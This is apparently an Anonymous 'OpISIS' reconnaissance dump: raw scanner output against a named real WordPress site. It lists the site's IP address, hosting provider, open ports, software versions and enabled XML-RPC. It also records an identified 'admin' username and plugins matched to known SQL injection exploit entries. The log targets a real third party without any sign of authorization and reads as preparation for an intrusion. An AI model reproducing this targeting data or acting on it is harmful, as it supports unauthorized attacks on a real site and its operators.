17950 Brute Forcing Author IDs - Time: 00:00:08 <==> (10 / 10) 100.00% Time: 00:00:08
17951
17952[i] User(s) Identified:
17953
17954[+] admin
17955 | Found By: Author Posts - Author Pattern (Passive Detection)
17956 | Confirmed By:
17957 | Rss Generator (Passive Detection)
17958 | Wp Json Api (Aggressive Detection)
17959 | - https://hizb-ut-tahrir.se/wp-json/wp/v2/users/?per_page=100&page=1
17960 | Rss Generator (Aggressive Detection)
17961 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
17962
17963[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
17964[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
17965
17966[+] Finished: Thu Jan 16 19:18:32 2020
17967[+] Requests Done: 47
17968[+] Cached Requests: 8
17969[+] Data Sent: 9.043 KB
17970[+] Data Received: 503.312 KB
17971[+] Memory used: 125.523 MB
17972[+] Elapsed time: 00:00:32
17973#######################################################################################################################################
17974[+] URL: http://hizb-ut-tahrir.se/
17975[+] Started: Thu Jan 16 19:21:08 2020
17976
18052
18053[+] Finished: Thu Jan 16 19:21:16 2020
18054[+] Requests Done: 14
18055[+] Cached Requests: 41
18056[+] Data Sent: 2.669 KB
18057[+] Data Received: 29.759 KB
18058[+] Memory used: 124.945 MB
18059[+] Elapsed time: 00:00:08
18060######################################################################################################################################
18061[INFO] ------TARGET info------
18062[*] TARGET: http://hizb-ut-tahrir.se/
18063[*] TARGET IP: 93.191.156.197
18064[INFO] NO load balancer detected for hizb-ut-tahrir.se...
18065[*] DNS servers: ns1.unoeuro.com.
18066[*] TARGET server: Apache
18067[*] CC: DK
18068[*] Country: Denmark
18069[*] RegionCode: 82
18070[*] RegionName: Central Jutland
18071[*] City: Skanderborg
18072[*] ASN: AS48854
18073[*] BGP_PREFIX: 93.191.152.0/21
18074[*] ISP: ZITCOM Zitcom A/S, DK
18075[INFO] DNS enumeration:
18147[INFO] Possible abuse mails are:
18148[*] abuse@hizb-ut-tahrir.se
18149[*] abuse@zitcom.dk
18150[INFO] NO PAC (Proxy Auto Configuration) file FOUND
18151[ALERT] robots.txt file FOUND in http://hizb-ut-tahrir.se/robots.txt
18152[INFO] Checking for HTTP status codes recursively from http://hizb-ut-tahrir.se/robots.txt
18153[INFO] Status code Folders
18154[*] 200 http://hizb-ut-tahrir.se/
18155[*] 200 http://hizb-ut-tahrir.se/webalizer/
18156[INFO] Starting FUZZing in http://hizb-ut-tahrir.se/FUzZzZzZzZz...
18157[INFO] Status code Folders
18158[ALERT] Look in the source code. It may contain passwords
18159[INFO] Links found from http://hizb-ut-tahrir.se/ http://93.191.156.197/:
18210cut: intervalle de champ incorrecte
18211Saisissez « cut --help » pour plus d'informations.
18212[INFO] Shodan detected the following opened ports on 93.191.156.197:
18213[*] 22
18214[*] 443
18215[*] 7
18216[*] 80
18217[INFO] ------VirusTotal SECTION------
18218[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
18219[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
18220[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
18221[INFO] ------Alexa Rank SECTION------
18222[INFO] Percent of Visitors Rank in Country:
18223[INFO] Percent of Search Traffic:
18224[INFO] Percent of Unique Visits:
18225[INFO] Total Sites Linking In:
18226[*] Total Sites
18227[INFO] Useful links related to hizb-ut-tahrir.se - 93.191.156.197:
18228[*] https://www.virustotal.com/pt/ip-address/93.191.156.197/information/
18229[*] https://www.hybrid-analysis.com/search?host=93.191.156.197
18230[*] https://www.shodan.io/host/93.191.156.197
18231[*] https://www.senderbase.org/lookup/?search_string=93.191.156.197
18232[*] https://www.alienvault.com/open-threat-exchange/ip/93.191.156.197
18233[*] http://pastebin.com/search?q=93.191.156.197
18234[*] http://urlquery.net/search.php?q=93.191.156.197
18235[*] http://www.alexa.com/siteinfo/hizb-ut-tahrir.se
18236[*] http://www.google.com/safebrowsing/diagnostic?site=hizb-ut-tahrir.se
18237[*] https://censys.io/ipv4/93.191.156.197
18238[*] https://www.abuseipdb.com/check/93.191.156.197
18239[*] https://urlscan.io/search/#93.191.156.197
18240[*] https://github.com/search?q=93.191.156.197&type=Code
18241[INFO] Useful links related to AS48854 - 93.191.152.0/21:
18242[*] http://www.google.com/safebrowsing/diagnostic?site=AS:48854
18243[*] https://www.senderbase.org/lookup/?search_string=93.191.152.0/21
18244[*] http://bgp.he.net/AS48854
18245[*] https://stat.ripe.net/AS48854
18246[INFO] Date: 16/01/20 | Time: 19:23:21
18247[INFO] Total time: 2 minute(s) and 2 second(s)
18248######################################################################################################################################
18249[-] Target: http://hizb-ut-tahrir.se (93.191.156.197)
18250[M] Website Not in HTTPS: http://hizb-ut-tahrir.se
18251[I] Server: Apache
18252[I] X-Powered-By: PHP/5.6.40
18253[L] X-Frame-Options: Not Enforced
18254[I] Strict-Transport-Security: Not Enforced
18255[I] X-Content-Security-Policy: Not Enforced
18256[I] X-Content-Type-Options: Not Enforced
18257[L] Robots.txt Found: http://hizb-ut-tahrir.se/robots.txt
18258[I] CMS Detection: WordPress
18259[I] Wordpress Version: 5.3.2
18260[I] Wordpress Theme: flymag
18261[-] WordPress usernames identified:
18262[M] admin
18263[M] XML-RPC services are enabled
18264[I] Autocomplete Off Not Found: http://hizb-ut-tahrir.se/wp-login.php
18265[-] Default WordPress Files:
18266[I] http://hizb-ut-tahrir.se/license.txt
18267[I] http://hizb-ut-tahrir.se/readme.html
18268[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/genericons/COPYING.txt
18269[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/genericons/LICENSE.txt
18270[I] http://hizb-ut-tahrir.se/wp-content/themes/twentyfifteen/readme.txt
18271[I] http://hizb-ut-tahrir.se/wp-content/themes/twentynineteen/readme.txt
18272[I] http://hizb-ut-tahrir.se/wp-content/themes/twentytwenty/readme.txt
18273[I] http://hizb-ut-tahrir.se/wp-includes/ID3/license.commercial.txt
18274[I] http://hizb-ut-tahrir.se/wp-includes/ID3/license.txt
18275[I] http://hizb-ut-tahrir.se/wp-includes/ID3/readme.txt
18276[I] http://hizb-ut-tahrir.se/wp-includes/images/crystal/license.txt
18277[I] http://hizb-ut-tahrir.se/wp-includes/js/plupload/license.txt
18278[I] http://hizb-ut-tahrir.se/wp-includes/js/swfupload/license.txt
18279[I] http://hizb-ut-tahrir.se/wp-includes/js/tinymce/license.txt
18280[-] Searching Wordpress Plugins ...
18281[I] feed
18282[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
18283[I] jetpack v7.1.1
18284[M] EDB-ID: 18126 "WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection"
18285[I] lazy-load v0.6.1
18286[I] ultimate-faqs
18287[I] Checking for Directory Listing Enabled ...
18288[-] Date & Time: 16/01/2020 19:26:25
18289[-] Completed in: 0:08:11
18290#######################################################################################################################################
18291 Anonymous JTSEC #OpISIS Full Recon #34